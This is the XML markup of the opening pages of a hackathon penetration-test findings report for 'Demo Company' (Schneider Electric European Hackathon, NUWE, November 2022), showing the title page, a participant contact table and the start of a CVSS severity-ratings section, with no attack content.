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5BFEF" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3981154F" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="281B3751" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40F8B5C9" wp14:editId="2062BDAF">
            <wp:extent cx="4591050" cy="4591050"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16" name="image17.jpg" descr="Nuwe - YouTube"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image17.jpg" descr="Nuwe - YouTube"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4591050" cy="4591050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3725DA12" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="422BAE7E" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:ind w:left="2124" w:firstLine="707"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Demo Company</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C9F337" w14:textId="242F0F8C" w:rsidR="00BC1FF2" w:rsidRDefault="00000000" w:rsidP="00A20B6B">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r>
        <w:t>Security Assessment Findings Report</w:t>
      </w:r>
      <w:r w:rsidR="00A20B6B">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00A20B6B" w:rsidRPr="00A20B6B">
        <w:t>Schneider Electric European Hackathon</w:t>
      </w:r>
      <w:r w:rsidR="00A20B6B">
        <w:t xml:space="preserve"> - NUWE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08845083" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2"/>
    <w:p w14:paraId="571168A9" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2"/>
    <w:p w14:paraId="51E908A4" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2"/>
    <w:p w14:paraId="73FD4EF8" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2"/>
    <w:p w14:paraId="57CB86AA" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2"/>
    <w:p w14:paraId="35FA0A4A" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2"/>
    <w:p w14:paraId="54698D40" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2"/>
    <w:p w14:paraId="705CBE51" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Date: November 19</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2022</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FE231C" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2"/>
    <w:p w14:paraId="2095C26A" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_heading=h.gjdgxs" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Contact Information</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a"/>
        <w:tblW w:w="10080" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1872"/>
        <w:gridCol w:w="8208"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="3E8AE109" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C501CCC" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="186D921B" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="70E7FE31" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
          <w:color w:val="000000"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a0"/>
        <w:tblW w:w="10080" w:type="dxa"/>
        <w:tblInd w:w="-7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5"/>
        <w:gridCol w:w="2805"/>
        <w:gridCol w:w="4950"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="0B7596B7" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2325" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="7F7F7F"/>
            <w:tcMar>
              <w:left w:w="58" w:type="dxa"/>
              <w:right w:w="58" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0F0F9B89" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:eastAsia="Century Gothic" w:hAnsi="Century Gothic" w:cs="Century Gothic"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:eastAsia="Century Gothic" w:hAnsi="Century Gothic" w:cs="Century Gothic"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2805" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="7F7F7F"/>
            <w:tcMar>
              <w:left w:w="58" w:type="dxa"/>
              <w:right w:w="58" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="64CE8273" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:eastAsia="Century Gothic" w:hAnsi="Century Gothic" w:cs="Century Gothic"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:eastAsia="Century Gothic" w:hAnsi="Century Gothic" w:cs="Century Gothic"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Title</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4950" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="7F7F7F"/>
            <w:tcMar>
              <w:left w:w="58" w:type="dxa"/>
              <w:right w:w="58" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="616F7202" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:eastAsia="Century Gothic" w:hAnsi="Century Gothic" w:cs="Century Gothic"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic" w:eastAsia="Century Gothic" w:hAnsi="Century Gothic" w:cs="Century Gothic"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>Contact Information</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="249B06C2" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10080" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:tcMar>
              <w:left w:w="58" w:type="dxa"/>
              <w:right w:w="58" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="392391BE" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">NUWE x Schneider Electric </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="1EB72BFF" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2325" w:type="dxa"/>
            <w:tcMar>
              <w:left w:w="58" w:type="dxa"/>
              <w:right w:w="58" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6A5F070F" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Andrea Silvestroni</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2805" w:type="dxa"/>
            <w:tcMar>
              <w:left w:w="58" w:type="dxa"/>
              <w:right w:w="58" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5A9EA855" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Participant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4950" w:type="dxa"/>
            <w:tcMar>
              <w:left w:w="58" w:type="dxa"/>
              <w:right w:w="58" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="13ACB593" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Email: aasilvestroni@gmail.com</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63BE8312" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Github</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>: https://github.com/asilvestroni</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="7DC3DFEA" w14:textId="77777777">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2325" w:type="dxa"/>
            <w:tcMar>
              <w:left w:w="58" w:type="dxa"/>
              <w:right w:w="58" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="741FA309" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Samuele</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Turci</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2805" w:type="dxa"/>
            <w:tcMar>
              <w:left w:w="58" w:type="dxa"/>
              <w:right w:w="58" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7CBE8275" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Participant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4950" w:type="dxa"/>
            <w:tcMar>
              <w:left w:w="58" w:type="dxa"/>
              <w:right w:w="58" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="339FBBD0" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Email: samuele.turci98+nuwe@gma</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>il.com</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11F4F767" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Github</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>: https://github.com/NextLight</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5E72085F" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_heading=h.30j0zll" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B801CC" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_heading=h.9tpbcmrd5it9" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Finding Severity Ratings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4929CE6B" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2"/>
    <w:p w14:paraId="63E0BA82" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00000000">
      <w:r>
        <w:t>The following table defines levels of severity and corresponding CVSS score range that are used throughout the document to assess vulnerability and risk impact.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5FECB0" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
          <w:color w:val="000000"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E07DF26" w14:textId="77777777" w:rsidR="00BC1FF2" w:rsidRDefault="00BC1FF2">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Libre Franklin" w:eastAsia="Libre Franklin" w:hAnsi="Libre Franklin" w:cs="Libre Franklin"/>
          <w:color w:val="000000"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a1"/>
        <w:tblW w:w="10074" w:type="dxa"/>
        <w:tblInd w:w="-7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84"/>
        <w:gridCol w:w="1620"/>
        <w:gridCol w:w="6570"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC1FF2" w14:paraId="0B5BD59A" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="170"/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1884" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
